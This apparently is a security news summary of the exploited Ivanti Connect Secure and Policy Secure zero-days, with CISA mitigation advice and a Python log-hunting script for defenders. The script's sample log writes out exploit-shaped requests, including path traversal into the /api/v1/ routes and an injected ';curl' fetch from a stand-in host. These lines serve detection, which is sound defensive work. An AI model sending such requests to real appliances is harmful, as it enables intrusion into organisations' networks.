Threat actors have been actively exploiting multiple Ivanti zero-day vulnerabilities affecting Ivanti Connect Secure (ICS) [7], Ivanti Policy Secure (IPS) [1] [4] [6] [7] [9], and ZTA gateways worldwide [4].

Description

Threat actors have been exploiting Ivanti zero-day vulnerabilities [10], including CVE-2023-46805 (an authentication bypass in the web component) [4] [8] [9] [11], CVE-2024-21887 (a command injection in the web component) [1] [2] [3] [4] [6] [7] [8] [9] [10] [11], and CVE-2024-21893 (a server-side request forgery in the SAML component) [1] [2] [3] [4] [6] [7] [8] [9] [11]. Chained together, these flaws let an unauthenticated attacker bypass authentication [2] [9], execute arbitrary commands with elevated privileges on the appliance [1] [2] [6] [8] [9] [11], and carry out further malicious activity from it [10]. Volexity researchers linked the initial exploitation to a Chinese nation-state actor [7]. Two further vulnerabilities were identified afterwards: CVE-2024-21888 (a privilege escalation to administrator) and CVE-2024-22024 (an XML external entity flaw in the SAML component). Exploitation of CVE-2023-46805, CVE-2024-21887 and CVE-2024-21893 has been observed in the wild [3], including the installation of the 'DSLog' backdoor on more than 670 compromised appliances [3].

CISA confirmed the exploitation and directed Federal Civilian Executive Branch agencies to disconnect ICS and IPS devices [7]. Organizations are advised to assume that credentials stored on or passing through the appliance are compromised, to hunt for malicious activity [1] [6], and to follow Ivanti's patching guidance [1] [2] [6]. Ivanti's Integrity Checker Tool (ICT) cannot be relied on to prove a device is clean: a compromised appliance may still pass the check [2] [7], so a clean ICT result should not end an investigation. CISA and its Five Eyes partners published detection methods, indicators of compromise [9] [11], and mitigation guidance [4] [11], and industry partners reported widespread exploitation of these vulnerabilities [8] [11].

Both security researchers and threat actors identified these zero-days in Ivanti products [5], which allow unauthorized access to internal networks [5]. CISA warns that the vulnerabilities are being actively exploited and advises users to patch and update their devices [5]; keeping operating systems and firmware current is the baseline mitigation [5]. The CEO of Xage Security pointed to inherent weaknesses in key perimeter security products [10], particularly legacy VPNs [10].
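The advisories cited above publish detection methods and indicators, but the page does not reproduce them. As an added example, not code from the page, CISA or Ivanti, the script below hunts NCSA-format web access logs for the two request shapes publicly reported for the CVE-2023-46805 + CVE-2024-21887 chain: a `..` traversal into the unauthenticated /api/v1/ routes, and shell metacharacters in the percent-decoded path. The heuristics, the endpoint names and the log lines are assumptions made for illustration; the sample log is constructed and includes a double-encoded request to show why decoding must be repeated.

```python
"""Hunt access logs for request patterns matching the publicly reported
Ivanti Connect Secure / Policy Secure exploit chain.

Added example, not from the page or from Ivanti/CISA. The two heuristics
(traversal into /api/v1/ and shell metacharacters in the decoded path) are
assumptions based on public reporting of CVE-2023-46805 + CVE-2024-21887,
not rules given on this page. Log format is assumed to be NCSA common log format.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Constructed sample lines; not real appliance logs. Addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2024:10:01:02 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
198.51.100.9 - - [12/Jan/2024:10:02:15 +0000] "GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1" 200 812
198.51.100.9 - - [12/Jan/2024:10:02:16 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/;id HTTP/1.1" 200 322
198.51.100.9 - - [12/Jan/2024:10:02:18 +0000] "GET /api/v1/totp/user-backup-code/%252e%252e/%252e%252e/license/keys-status/%3bcurl%20http://203.0.113.77/x HTTP/1.1" 200 322
203.0.113.7 - - [12/Jan/2024:10:03:00 +0000] "GET /dana-na/css/ds.css HTTP/1.1" 200 2100
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# ".." as a whole path segment, checked after decoding
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
# characters a shell treats as command separators or substitution
SHELL_META_RE = re.compile(r'[;|`$]')


@dataclass
class Finding:
    client: str
    timestamp: str
    method: str
    uri: str
    rules: list = field(default_factory=list)


def fully_decode(s: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly so double-encoded traversals (%252e) are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(uri: str) -> list:
    """Return the names of the heuristics the decoded request path trips."""
    path = fully_decode(uri.split('?', 1)[0])  # query string is not part of the route
    rules = []
    if path.startswith('/api/v1/') and TRAVERSAL_RE.search(path):
        rules.append('api_path_traversal')
    if SHELL_META_RE.search(path):
        rules.append('shell_metachar_in_path')
    return rules


def hunt(log_text: str) -> list:
    """Parse each line and return a Finding for every request that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the sweep
        rules = classify(m['uri'])
        if rules:
            findings.append(Finding(m['client'], m['ts'], m['method'], m['uri'], rules))
    return findings


if __name__ == '__main__':
    for f in hunt(SAMPLE_LOG):
        print(f.timestamp, f.client, f.method, f.uri, ','.join(f.rules))
```

Run this against logs collected off the appliance (an upstream reverse proxy, a load balancer, or a syslog collector) rather than the appliance's own logs: an attacker with root on the device can wipe or edit local logs, which is the same reason a clean ICT result is not proof of a clean device.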

Conclusion

Organizations should act immediately: apply Ivanti's patches, limit outbound internet connections from the SSL VPN appliance [5], restrict the appliance's access to only the internal services it requires [5], and apply a least-privilege approach to all accounts [5]. Continuous monitoring and timely security updates are essential to mitigate the risk from these exploits. Sophisticated threat actors may have established rootkit-level persistence on compromised devices [1] [5], allowing them to remain undetected for extended periods [5], so a patched device should still be treated as suspect until it has been investigated. Users must stay vigilant and proactive in protecting their systems from these threats.

References

[1] https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b
[2] https://www.infosecurity-magazine.com/news/five-eyes-warn-ivanti/
[3] https://vulners.com/hivepro/HIVEPRO:BF72098E6E2F75D4E00C6F5597E32038
[4] https://www.computerweekly.com/feature/Ivanti-vulnerabilities-explained-Everything-you-need-to-know
[5] https://expel.com/blog/security-alert-ivanti-connect-secure-and-policy-secure-zero-day-vulnerabilities/
[6] https://dig.watch/updates/intelligence-advisory-cyber-threat-actors-exploit-vulnerabilities-in-ivanti-gateways
[7] https://www.techtarget.com/searchSecurity/news/366571739/CISA-warns-Ivanti-ICT-ineffective-for-detecting-compromises
[8] https://www.redpacketsecurity.com/cisa-cisa-and-partners-release-advisory-on-threat-actors-exploiting-ivanti-connect-secure-and-policy-secure-gateways-vulnerabilities-04-03-2024/
[9] https://securityaffairs.com/159807/hacking/fiveeye-warns-ivanti-gateways-attacks.html
[10] https://www.cybersecuritydive.com/news/ivanti-exploit-warnings-global-five-eyes/708996/
[11] https://www.cisa.gov/news-events/alerts/2024/02/29/cisa-and-partners-release-advisory-threat-actors-exploiting-ivanti-connect-secure-and-policy-secure